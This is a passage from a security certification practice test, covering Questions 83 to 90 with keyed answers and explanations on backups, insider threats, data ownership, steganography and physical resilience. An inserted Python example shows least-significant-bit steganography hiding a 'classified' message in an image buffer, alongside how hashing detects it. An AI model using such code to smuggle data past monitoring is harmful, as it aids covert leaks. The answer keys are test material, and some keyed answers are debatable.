Biometrics, such as fingerprint or retina scans, authenticate a person by a physical characteristic and directly deny entry to anyone who does not match an enrolled user, which makes them a strong preventive control for physical access. They are harder to share or copy than a badge or PIN, though no biometric is foolproof: false acceptance and false rejection rates must be tuned, and biometrics are commonly combined with a second factor such as a smart card.

Alarms

Explanation

Alarms can alert security personnel to unauthorized access attempts in the data center, but they do not directly prevent access. While alarms can be a valuable component of a security system, they are more reactive in nature and may not be as effective as biometric controls for preventing unauthorized entry.

Motion Sensors

Explanation

Motion sensors can detect movement in the data center, but they may not be the most effective preventive control for restricting unauthorized access. While they can alert security personnel to potential intruders, they do not provide a foolproof method of authentication or access control.

Overall explanation

1.1 Compare and contrast various types of security controls.

The most effective preventive control that the trading agency should implement is biometrics. Biometric authentication such as fingerprint or retina scans greatly reduces the risk of unauthorized personnel physically accessing the data center.

Domain

1.0 General Security Concepts

Question 83Skipped

An organization's primary data center was recently struck by a cyclone, which caused extensive flood damage. Despite the catastrophic losses, its critical data was recovered. Which practice was most significant in ensuring the successful recovery of the data?

Correct answer

Backups

Explanation

Backups are the most significant practice in ensuring the successful recovery of data in the event of a disaster like a cyclone. Regular backups of critical data to offsite locations or cloud storage ensure that data can be restored in case of data center damage or loss. This practice is essential for data recovery and business continuity.

IDS

Explanation

IDS (Intrusion Detection System) is a security tool that monitors network traffic for suspicious activity or security breaches. While IDS is important for detecting and responding to security incidents, it is not directly related to ensuring the successful recovery of data after a disaster like a cyclone.

IAM

Explanation

IAM (Identity and Access Management) is a security practice that focuses on managing user identities and their access to resources within an organization’s IT infrastructure. While IAM is crucial for controlling access to data and systems, it is not directly related to ensuring the successful recovery of data after a disaster like a cyclone.

RAID

Explanation

RAID (Redundant Array of Independent Disks) is a data storage technology that combines multiple disk drives into a single logical unit to improve performance, fault tolerance, and data redundancy. While RAID can help protect against disk failures and improve data availability, it is not specifically designed for data recovery in the event of a catastrophic event like a cyclone.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

Backups were the most significant factor in the successful recovery of the data. Backups stored offsite, and ideally offline on external media, protect the copies from physical damage at the primary data center; a backup kept in the same flooded facility would have been lost along with the servers. Backups should also be restored periodically in tests, since a copy that cannot be restored offers no recovery at all.

Domain

3.0 Security Architecture

Question 84Skipped

A disgruntled employee has learned that he will soon be laid off because the company, facing challenging times, is downsizing its staff. The employee has privileged access to critical network resources. What type of threat is the organization likely to face?

Political

Explanation

A political threat usually involves issues related to government regulations, policies, or actions that may impact the organization’s operations. The situation described in the question is more about an individual employee’s actions rather than political factors.

Correct answer

Internal

Explanation

The organization is likely to face an internal threat in this scenario because the disgruntled employee with privileged access to critical network resources poses a significant risk to the organization’s security. Internal threats are often more challenging to detect and mitigate compared to external threats.

Ethical

Explanation

An ethical threat refers to situations where employees or individuals within the organization act unethically, such as engaging in fraudulent activities or violating company policies. While the disgruntled employee’s actions may be unethical, the primary concern in this scenario is the potential security risk posed by the employee’s privileged access.

External

Explanation

An external threat typically comes from outside the organization, such as hackers or cybercriminals attempting to breach the network security. In this scenario, the threat is originating from within the organization itself, not from an external source.

Overall explanation

2.1 Compare and contrast common threat actors and motivations.

The organization is likely to face an internal threat. The employee is upset after learning that he will be laid off, so the motivation and intent to harm the company exist, and because he has privileged access to critical network resources, the capability exists as well. Internal actors are dangerous precisely because their access is legitimate, so their activity may not trigger controls aimed at external attackers.

Domain

2.0 Threats, Vulnerabilities, and Mitigations

Question 85Skipped

The IT department of a large business conglomerate manages a critical database containing sensitive business data. What is the responsibility of the owner of the data stored in the critical database?

Correct answer

Setting access permissions and policies

Explanation

Setting access permissions and policies is a key responsibility of the data owner to ensure that only authorized individuals can access the sensitive business data stored in the critical database. This helps protect the data from unauthorized access and potential breaches.

Implementing technical security measures

Explanation

Implementing technical security measures is typically the responsibility of the IT department or security team, not the data owner. The data owner is more focused on setting access permissions and policies to protect the data.

Monitoring the database for malicious activities

Explanation

Monitoring the database for malicious activities is typically the responsibility of the IT department or security team, not the data owner. The data owner’s responsibility lies more in setting access permissions and policies to prevent unauthorized access.

Ensuring data is backed up regularly

Explanation

Ensuring data is backed up regularly is an important task for data protection, but it is not specifically the responsibility of the data owner. Setting access permissions and policies is more directly related to the data owner’s role in protecting the data.

Overall explanation

5.1 Summarize elements of effective security governance.

Setting access permissions and policies is the responsibility of the data owner. The owner decides how the data is classified, who may access it and how it may be used, and holds ultimate accountability for its security and privacy. Implementing and operating the controls that enforce those decisions falls to the custodian or steward, typically the IT or security team, which is why the other options describe custodial tasks rather than the owner's.

Domain

5.0 Security Program Management and Oversight

Question 86Skipped

An employee working at a government agency has been suspected of leaking classified government information to foreign intelligence agencies, however, no evidence of data transfers or email exchange was found. What technique is possibly being used to leak the data?

Macros

Explanation

Macros are small programs or scripts that can automate tasks in applications like Microsoft Excel or Word. While macros can be used for malicious purposes, such as spreading malware, they are not typically used for hiding or leaking classified information without leaving a trace.

Hashing

Explanation

Hashing is a one-way cryptographic function that maps data to a fixed-size digest. While hashing is commonly used for integrity verification and password storage, it is not a way to leak classified information: it neither hides data nor carries it anywhere.

Correct answer

Steganography

Explanation

Steganography is the practice of concealing messages or information within other non-secret data or media. This technique allows individuals to hide sensitive information within seemingly innocent files, such as images or audio files, making it difficult to detect the presence of the hidden data. In this scenario, the suspected employee may be using steganography to hide and leak classified government information without leaving any obvious evidence.

Eidetic memory

Explanation

Eidetic memory, also known as photographic memory, refers to the ability to recall images, sounds, or objects in great detail after only a short exposure. While individuals with eidetic memory may have exceptional recall abilities, this technique is not typically used for leaking classified information to foreign intelligence agencies. It is more focused on memory retention and recall rather than covert information sharing.

Overall explanation

1.4 Explain the importance of using appropriate cryptographic solutions.

The employee at the government agency is possibly using steganography to leak the data. The employee is suspected of leaking information, but no direct evidence of transfers has been found, which is consistent with the data being hidden inside innocuous files. Steganography hides or embeds secret data within non-confidential files or messages so that the existence of the secret information is concealed. It is commonly used to bypass data loss prevention controls that inspect file types, keywords or patterns. Detection relies on steganalysis, for example statistical analysis of image data, or on comparing files against known-good hashes, because embedding changes the carrier's bytes even when it does not visibly change the content.

Domain

1.0 General Security Concepts
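As an added example that is not part of the practice test, the Python below shows the technique from the explanation above at its simplest: a secret is written into the least significant bit of each byte of a raw RGB image buffer and later extracted, while no byte of the carrier changes by more than one. The carrier is constructed in code rather than read from a real image file, and the 32-bit length header is this example's own framing convention.

```python
"""LSB steganography in a raw RGB buffer (added example, not from the test).

The carrier is constructed instead of loaded from a real image, and the
32-bit big-endian length header is this example's own framing convention.
"""
import hashlib
import struct


def embed(carrier: bytes, secret: bytes) -> bytes:
    """Hide `secret` in the least significant bit of successive carrier bytes."""
    payload = struct.pack(">I", len(secret)) + secret   # length-prefixed
    bits = [(b >> (7 - i)) & 1 for b in payload for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit   # overwrite the LSB only
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, from the LSBs."""
    def read_bytes(offset_bits, n):
        vals = bytearray()
        for k in range(n):
            v = 0
            for i in range(8):
                v = (v << 1) | (stego[offset_bits + k * 8 + i] & 1)
            vals.append(v)
        return bytes(vals)
    (length,) = struct.unpack(">I", read_bytes(0, 4))
    return read_bytes(32, length)


def max_byte_delta(a: bytes, b: bytes) -> int:
    """Largest change to any single byte; 1 means invisible to the eye."""
    return max(abs(x - y) for x, y in zip(a, b))


def digest_differs(a: bytes, b: bytes) -> bool:
    """What a hash-based DLP or integrity check would see."""
    return hashlib.sha256(a).digest() != hashlib.sha256(b).digest()


# Constructed 64x64 RGB carrier: a smooth gradient, 12288 bytes.
CARRIER = bytes(((x * 4) % 256 if c == 0 else (y * 4) % 256 if c == 1 else 128)
                for y in range(64) for x in range(64) for c in range(3))
SECRET = b"CLASSIFIED: meeting moved to 0900"

if __name__ == "__main__":
    stego = embed(CARRIER, SECRET)
    print("recovered:", extract(stego))
    print("max per-byte change:", max_byte_delta(CARRIER, stego))
    print("hash changed:", digest_differs(CARRIER, stego))
```

The two helper checks show both sides of the detection problem: the image looks identical, so content inspection finds nothing, but the carrier's hash no longer matches the original, so a control that compares files against known-good hashes, or that looks at the statistical distribution of least significant bits, can still catch it.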

Question 87Skipped

Which of the below processes can assist the librarians at a public library in verifying the identities of users who want to access e-books and online resources from their new online digital lending platform?

Implementation of multi-factor authentication for all library services

Explanation

Implementing multi-factor authentication for all library services strengthens login security by requiring two or more factors, but authentication only confirms that a person holds the credentials of an already enrolled account. It does not establish who a new user actually is, which is the identity proofing problem the question describes.

Enabling anonymous library services accessibility

Explanation

Enabling anonymous library services accessibility does not assist in verifying the identities of users accessing e-books and online resources. It may compromise the security and integrity of the digital lending platform by allowing unidentified users to access sensitive materials.

Correct answer

Submission of a copy of a government-issued photo ID

Explanation

Submission of a copy of a government-issued photo ID is a reliable method for verifying the identities of users before they are granted access to e-books and online resources. It provides identity proofing at enrollment, so the library has assurance that the account belongs to a real, eligible person. The copies are sensitive personal data and should be protected and retained only as long as the verification requires.

Accepting social media profiles for verifications

Explanation

Accepting social media profiles for verifications may not be a secure method for verifying the identities of users accessing e-books and online resources. Social media profiles can be easily faked or compromised, leading to potential security risks for the library’s digital lending platform.

Overall explanation

4.6 Given a scenario, implement and maintain identity and access management.

The submission of a copy of a government-issued photo ID can assist the librarians at a public library in verifying the identities of users. This will help to provide assurance that the individuals accessing the online resources and e-books are genuine library members.

Domain

4.0 Security Operations

Question 88Skipped

What course of action should be taken by the team at a data center who have discovered that one of their critical generators has developed an unprecedented fault and may not function if an outage occurs?

Shutdown the data center till the generator is fixed

Explanation

Shutting down the entire data center until the generator is fixed may not be the most efficient solution, especially if there are critical operations that need to continue running. It is important to isolate the faulty generator and implement contingency plans to ensure continuity of operations.

Correct answer

Isolate the faulty generator

Explanation

Isolating the faulty generator is the correct course of action to prevent it from causing further damage or potentially affecting the entire data center’s operations. By isolating the faulty generator, the team can ensure that the rest of the infrastructure remains operational.

Closely monitor the performance of the faulty generator

Explanation

Closely monitoring the performance of the faulty generator may provide some insights into its current state, but it does not address the immediate risk of a potential outage. It is important to take proactive steps to mitigate the impact of a potential failure.

Immediately purchase a new generator

Explanation

Immediately purchasing a new generator may not be necessary if the fault can be repaired or if there are backup systems in place to handle the load in case of an outage. It is important to assess the situation and consider all available options before making a significant investment in a new generator.

Overall explanation

3.4 Explain the importance of resilience and recovery in security architecture.

The team at the data center should isolate the faulty generator so that it cannot cause further problems, for example by failing under load or feeding a fault back into the switchgear. Because only one of several generators has failed, the remaining units still provide power redundancy. Purchasing a new generator is a viable long-term fix, but procurement and installation take time, and monitoring alone does nothing to reduce the risk if an outage occurs first.

Domain

3.0 Security Architecture

Question 89Skipped

A financial services firm that processes many transactions daily is implementing compliance monitoring automation to adhere to strict regulatory compliance requirements. What is the major advantage of the automation?

Correct answer

Enhanced data security

Explanation

Enhanced data security is the major advantage of automation in compliance monitoring. By automating the process, the firm can ensure that all transactions are consistently monitored for compliance with regulatory requirements, reducing the risk of human error and potential security breaches.

Increased transactions speed

Explanation

Increased transaction speed is not the major advantage of automation in compliance monitoring. While automation can improve efficiency and streamline processes, the primary focus of compliance monitoring automation in a financial services firm is to ensure regulatory compliance and data security.

Reduced training costs

Explanation

Reduced training costs are not the major advantage of automation in compliance monitoring. While automation can lead to cost savings in terms of efficiency and resource allocation, the primary goal of compliance monitoring automation in a financial services firm is to ensure adherence to regulatory requirements and enhance data security.

Streamlined vendor management

Explanation

Streamlined vendor management is not the major advantage of automation in compliance monitoring. While automation can help streamline various processes within the organization, the primary focus of compliance monitoring automation in a financial services firm is to ensure regulatory compliance and data security, rather than vendor management.

Overall explanation

5.4 Summarize elements of effective security compliance.

The major advantage of compliance monitoring automation is enhanced data security. The financial services firm aims to adhere to strict regulatory compliance requirements. Automation checks data-handling practices consistently against those requirements rather than relying on manual sampling, which reduces the risk of both data breaches and non-conformance going unnoticed.

Domain

5.0 Security Program Management and Oversight

Question 90Skipped

The physical security team is concerned about the security of the premises at an organization in the event of an unexpected power outage. What measures can they take to reduce potential security risks during a blackout?

Correct answer

Backup generators and emergency lights

Explanation

Backup generators and emergency lights are essential measures to reduce potential security risks during a blackout. Backup generators can ensure that critical systems, such as security cameras, alarms, and access control systems, remain operational during a power outage. Emergency lights can provide visibility and guidance in the event of a blackout, helping to maintain security and safety on the premises.

Biometric access control

Explanation

Biometric access control systems provide a secure way to manage access to the premises, but they rely on power to function. In the event of a blackout, biometric access control systems may become inaccessible, potentially increasing security risks.

Closed circuit television

Explanation

Closed circuit television (CCTV) can be a useful tool for monitoring and recording activities on the premises, but it may not directly address security risks during a blackout when the cameras may not be operational due to power loss.

Surge protectors

Explanation

Surge protectors are designed to protect electronic devices from power surges and spikes, but they do not provide a solution for maintaining security measures during a blackout. While surge protectors can prevent damage to equipment, they do not address security risks related to power outages.

Overall explanation

1.2 Summarize fundamental security concepts.

The physical security team can rely on backup generators and emergency lights. Emergency lighting, powered from a backup generator or from its own battery, keeps critical areas illuminated when an unexpected power outage occurs. Physical security is maintained because security personnel can still monitor the premises and its surroundings while performing their regular duties, and powered access controls, alarms and cameras keep working.

Domain

1.0 General Security Concepts